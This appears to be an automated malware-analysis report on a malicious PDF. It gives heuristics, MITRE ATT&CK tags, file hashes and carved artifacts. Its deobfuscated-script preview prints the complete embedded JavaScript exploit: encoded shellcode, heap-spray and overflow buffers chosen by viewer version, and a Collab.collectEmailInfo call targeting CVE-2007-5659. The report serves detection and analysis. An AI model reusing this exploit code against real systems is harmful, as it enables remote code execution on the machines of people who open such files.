Verdict: MALICIOUS
Risk Score: 260

Malware Insights
MITRE ATT&CK:
- T1059.001 PowerShell
- T1204.002 Malicious File
The PDF file was flagged as malicious by an ML classifier with high confidence. It contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The embedded JavaScript stream, named 'javascript_obj0020_000.js', is the primary indicator of malicious activity. While the exact behavior of the script is not fully detailed, its presence within a malicious PDF strongly suggests it's designed to download and execute a second-stage payload. No specific malware family could be identified.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9999

Heuristics (9)
- Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE exact] (CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Matched in decompressed stream.)
- JavaScript action [low; 2 related findings] (PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical] (PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: `sc = unescape("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0"+`
- Embedded JS stream [low] (PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage [high] (PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Embedded file [low] (PDF_EMBEDDED): PDF embeds a file attachment — it could carry an executable or another weaponised document as a nested payload.
- Object number defined twice with different bodies [info] (PDF_DUPLICATE_OBJ_BODY_INCREMENTAL): The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All five URLs below were found in PDF document text (they are the standard XMP/RDF metadata namespace URIs, not navigable links):
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/pdf/1.3/
  - http://ns.adobe.com/xap/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
Extracted artifacts 6
Files carved from inside the sample during analysis.
Filename: 2
- Kind: pdf-embedded-file
- Source: PDF EmbeddedFile object 1 at offset 0x72E
- Size: 4088 bytes
- SHA-256: 1d23761345727bb79d482d7c2af2ad3ae1d76ca173806f74b310636e062d7331

Filename: javascript_obj0020_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 20 at offset 0x77DB4
- Size: 9794 bytes
- SHA-256: dfea41c6bb89441a7cf8b0be9ee9217debdfcb1d656c3973d8864f96af3f9b27
Preview script (first 1,000 lines of the extracted script): the raw /JS stream is stored with a null byte between characters, so the unprocessed preview renders as spaced-out text. The null-collapsed form of the same script is shown under generic_stage_recovery_000.js.
Filename: stream_004_off00077db4.js
- Kind: decompressed-pdf-stream
- Source: PDF FlateDecoded stream at offset 0x77DB4
- Size: 4900 bytes
- SHA-256: 359a999055a456391681301e3b1c31d617f127bd28fc59b5e688c08d5de058a2

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 16 eval/decoder/string-building tokens)
Filename: generic_stage_recovery_000.js
- Kind: deobfuscated-js
- Source: generic stage recovery null-collapse from JavaScript object 20 at offset 0x77DB4
- Size: 4900 bytes
- SHA-256: 855e38a0aca23d3a53ae2b1ee8d6393c915d035ddf6a5fb080303532e309dec5

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 16 eval/decoder/string-building tokens)
Preview script (first 1,000 lines of the extracted script):
function re(count,what)
{
var v = "";
while (--count >= 0)
v += what;
return v;
}
function start()
{
sc = unescape("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0"+
"%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff"+
"%u5048%u5048%u5048%u5048%u5942%u6841%u5941%u5841"+
"%u5841%u6d48%u5843%u5a43%u5842%u7841%u5841%u5841"+
"%u5841%u4948%u6744%u4348%u7442%u5041%u4348%u7742"+
"%u6444%u6341%u4142%u6546%u5445%u7342%u6b41%u7042"+
"%u6c43%u4b48%u4843%u6841%u4b48%u4843%u5441%u4b48"+
"%u7843%u4441%u6d48%u4b48%u4843%u5041%u5345%u5841"+
"%u7342%u6843%u4b48%u6443%u4444%u4444%u4b48%u4d43"+
"%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48"+
"%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342"+
"%u6c41%u4143%u4b48%u6c41%u4b48%u6344%u4542%u6b41"+
"%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446"+
"%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442"+
"%u6341%u7443%u4444%u7041%u6546%u5142%u4b48%u5243"+
"%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48"+
"%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344"+
"%u7542%u4948%u4c43%u4444%u4441%u6943%u7342%u6b41"+
"%u7942%u5943%u4d48%u4d43%u5a43%u5843%u7846%u5841"+
"%u6444%u5841%u5841%u4f42%u6546%u4643%u4f42%u6546"+
"%u6641%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48"+
"%u4543%u5a43%u4b48%u6546%u4643%u4b48%u4e42%u734b"+
"%u484b%u484b%u484b%u484b%u4148%u7342%u5241%u5241"+
"%u5241%u5241%u6e43%u7142%u5942%u5a41%u6d48%u6b41"+
"%u7342%u6b48%u5242%u4a42%u6b41%u7942%u5943%u4d48"+
"%u4d43%u4646%u5843%u4f42%u6546%u5a43%u4b48%u4546"+
"%u4643%u5a43%u4f42%u6546%u4a43%u4f42%u4546%u4441"+
"%u4b48%u4546%u4646%u7141%u4546%u5243%u4348%u7543"+
"%u5243%u5841%u7743%u6b48%u4f42%u6546%u4a43%u4f42"+
"%u4546%u6444%u7342%u7643%u6842%u5242%u6346%u4b42"+
"%u5748%u4d42%u5741%u6b41%u7a42%u4a48%u5343%u4743"+
"%u6344%u7742%u774b%u7843%u6346%u5745%u6e41%u6548"+
"%u4f41%u5841%u7443%u4e41%u6d43%u4a42%u4841%u4741"+
"%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48"+
"%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445"+
"%u5748%u6344%u5441%u7841%u4943%u6b43%u7a43%u6743"+
"%u5a43%u6c43%u6b41%u6a41%u7641%u6d43%u7043%u6d43"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u6a48%u6a48%u6a48%u6a48%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841"+
"%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148"+
"%u5545%u6b43%u5841%u5841%u5841%u5842%u6442%u4e42"+
"%u4f42%u4f42%u4b48%u6845%u4b48%u4542%u4b48%u4e42"+
"%u4b48%u7645%u4348%u7142%u6841%u5842%u6f48%u4e42"+
"%u4f42%u4f42%u6b41%u7942%u4948%u4543%u6641%u4348"+
"%u4d43%u6641%u6444%u6b41%u7942%u5943%u4f42%u6546"+
"%u6641%u4f42%u4546%u4444%u6541%u5841%u5348%u6744"+
"%u5841%u7a43%u5445%u6541%u5841%u5648%u6744%u5841"+
"%u6746%u5542%u6b41%u7942%u5943%u5943%u7846%u4843"+
"%u6744%u5841%u5841%u4f42%u6546%u6641%u4f42%u4546"+
"%u7841%u6b41%u7942%u5943%u4d48%u4d43%u5a43%u5843"+
"%u4943%u7142%u5142%u5a41%u5943%u4d48%u4d43%u4e43"+
"%u5843%u4f42%u6546%u6641%u4f42%u4546%u7844%u6b41"+
"%u7942%u5943%u5943%u7846%u4c43%u6744%u5841%u5841"+
"%u4f42%u6546%u6641%u4f42%u4546%u7841%u7846%u4f42"+
"%u5841%u5841%u5841%u6243%u4843%u4f42%u4546%u7441"+
"%u4948%u4d43%u4243%u5843%u7846%u4f42%u5841%u5841"+
"%u5841%u4f42%u4546%u5041%u4f42%u6546%u4243%u4f42"+
"%u4546%u5441%u4546%u6b41%u7942%u5943%u7846%u484b"+
"%u5841%u5841%u5841%u6243%u5a41%u5943%u4943%u5943"+
"%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u6841"+
"%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48"+
"%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43"+
"%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348"+
"%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43"+
"%u4a43%u7846%u5841%u6444%u5841%u5841%u6243%u4843"+
"%u4f42%u4546%u7441%u4948%u4d43%u4643%u4b48%u4d43"+
"%u4e43%u4948%u4d43%u5243%u5842%u6e43%u4e42%u4f42"+
"%u4f42%u4546%u6b41%u7942%u5943%u4d48%u4d43%u6841"+
"%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48"+
"%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43"+
"%u7041%u5842%u4142%u4f42%u4f42%u4f42%u5543%u6243"+
"%u5841%u4f42%u4546%u5841%u5048%u5048%u5048%u5048"+
"%u3030");
if (app.viewerVersion >= 7.0)
{
plin = re(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u9090%u9090") + re(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + sc + re(1256,unescape("%u4141%u4141"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = re(80,unescape("%u9090%u9090")) + sc + re(80,unescape("%u9090%u9090"))+
unescape("%ue7e9%ufff9")+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") +
unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += re(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
this.collabStore = Collab.collectEmailInfo({subj: "",msg: plin});
}
}
//start完毕 (Chinese: "finished")
var shaft= app.setTimeOut("start()",1200);
Filename: generic_stage_recovery_001.js
- Kind: deobfuscated-js
- Source: generic stage recovery split-literal-normalize from decompressed stream at 0x77DB4 at offset 0x77DB4
- Size: 4540 bytes
- SHA-256: 5bfe4ffa20f9c99c4a38429aaa4226be1a40dd790b00956d8b08fc85f5e757fa

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 16 eval/decoder/string-building tokens)
Filename: generic_stage_recovery_002.js
- Kind: deobfuscated-js
- Source: generic stage recovery null-collapse -> split-literal-normalize from JavaScript object 20 at offset 0x77DB4
- Size: 4540 bytes
- SHA-256: 3006282805cdcacadde9249fbd866cc7960037c866f8594b55157fb9aa4c1449

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 16 eval/decoder/string-building tokens)